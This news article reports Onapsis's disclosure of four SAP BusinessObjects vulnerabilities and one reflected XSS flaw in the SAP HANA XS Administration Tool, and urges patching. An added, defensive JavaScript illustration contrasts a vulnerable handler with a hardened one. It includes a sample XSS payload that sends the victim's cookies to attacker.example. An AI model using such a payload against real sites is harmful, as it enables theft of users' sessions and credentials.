Five new vulnerabilities in two SAP products have been disclosed by Onapsis, a firm that specializes in security for business-critical applications. A senior security researcher with the company – Will Vandevanter – discovered one medium-risk and three high-risk vulnerabilities in SAP BusinessObjects, and one medium-risk vulnerability in SAP HANA.

Corporate headquarters of SAP AG in Walldorf, Germany – Photo by Thomas Lohnes / Getty Images

BusinessObjects is used by organizations for complex performance tracking and analysis, and therefore often has access to an enterprise's most sensitive data, including product pricing, financial forecasts, internal processes, and customer records. All four BusinessObjects vulnerabilities are triggered by crafted requests over CORBA, the inter-server communication protocol the platform uses, so the exposure of those CORBA-speaking services to untrusted networks is the decisive risk factor.

One of the high-risk BusinessObjects vulnerabilities (CVE-2015-2074) would, if successfully exploited, allow an unauthenticated remote attacker to overwrite sensitive business data held in mission-critical systems. Another high-risk vulnerability (CVE-2015-2073) would allow unauthenticated retrieval of sensitive data stored in the platform's File Repository Server. The final high-risk vulnerability (CVE-2015-2075) would allow an attacker to delete logged events from the remote auditing service: by clearing audit events from the service's queue, the attacker can remove the trace of their own activity and operate on the platform undetected.

The remaining BusinessObjects vulnerability (CVE-2015-2076), rated medium risk, would permit an unauthenticated attacker to read the platform's auditing information. Onapsis recommended restricting access to the feature that exposes the auditing event log to remote clients.

The lone medium-risk vulnerability affecting SAP HANA is a reflected cross-site scripting (XSS) flaw in the SAP HANA XS Administration Tool that can be leveraged to steal authentication information from users who follow a crafted link. "The SAP HANA XS Administration Tool can be used by potential attackers, allowing them to modify displayed application content without authorization, and to potentially obtain authentication information from other legitimate users," Onapsis explained in its security advisory.
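To make the mechanics of a reflected XSS flaw of this kind concrete, here is a small added JavaScript model. It is not SAP's code and not the XS Administration Tool's actual handler: it shows a request handler that reflects a query parameter into HTML unescaped, next to a hardened version that escapes the value and sets response headers that limit what an injected script could do. The handler names, the `app` parameter, and the payload are assumptions constructed for the illustration.

```javascript
// Added illustration of a reflected XSS flaw and its fix.
// This is NOT the SAP HANA XS Administration Tool's code; the handler names,
// the "app" query parameter and the payload below are assumptions.

// Minimal HTML escaping for text placed into an element body or attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: reflects the query parameter straight into the page body,
// so markup supplied in the link is interpreted by the victim's browser.
function renderVulnerable(params) {
  const name = params.get('app') || '';
  return `<h1>Application: ${name}</h1>`;
}

// Hardened: escapes before reflecting, and adds headers that limit the
// impact even if some other reflection point were missed.
function renderHardened(params) {
  const name = params.get('app') || '';
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
      // No 'unsafe-inline': inline <script> injected via reflection is blocked.
      'Content-Security-Policy': "default-src 'self'",
    },
    body: `<h1>Application: ${escapeHtml(name)}</h1>`,
  };
}

// Constructed payload of the kind a reflected XSS link would carry: it tries
// to ship the victim's cookies (session/authentication data) to an attacker.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Runs both handlers against the same crafted request and reports whether the
// payload survives as executable markup.
function demo() {
  const params = new URLSearchParams({ app: PAYLOAD });
  const vulnerable = renderVulnerable(params);
  const hardened = renderHardened(params).body;
  return {
    vulnerableContainsScript: /<script>/.test(vulnerable),
    hardenedContainsScript: /<script>/.test(hardened),
    hardened,
  };
}
```

In the hardened variant the payload reaches the page only as inert text (`&lt;script&gt;...`), and the Content-Security-Policy header blocks inline script even if an escaping bug slipped through elsewhere. Marking session cookies `HttpOnly` would additionally keep them out of reach of any script that did run, which directly addresses the "obtain authentication information" outcome described in the advisory.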

SAP was notified of all five vulnerabilities in January of 2014 and has since issued security patches to address the issues. The Onapsis advisories “strongly” recommended that users of both products download and deploy the security updates if they have not already done so.

Recent research from IDC has shown that applying updates to vulnerable enterprise applications takes an average of 18 months from the time a vulnerability is discovered. For these BusinessObjects and HANA vulnerabilities, a long lag between the release of a security update and the patching of affected systems needlessly extends the window in which an organization is exposed. IDC's data make the point clearly: nearly three-quarters of enterprise application attacks could have been prevented had the targeted system been patched against known security bugs.

“Taking steps to patch these vulnerabilities, or to implement control measures, is critical to protecting your SAP systems,” said Ezequiel Gutesman, director of research for Onapsis, in a press statement. “Recent headlines alone have shown us the consequences of not having proper security measures in place, especially when you’re dealing with systems that are housing data and processing transactions vital to the ongoing success of your business.”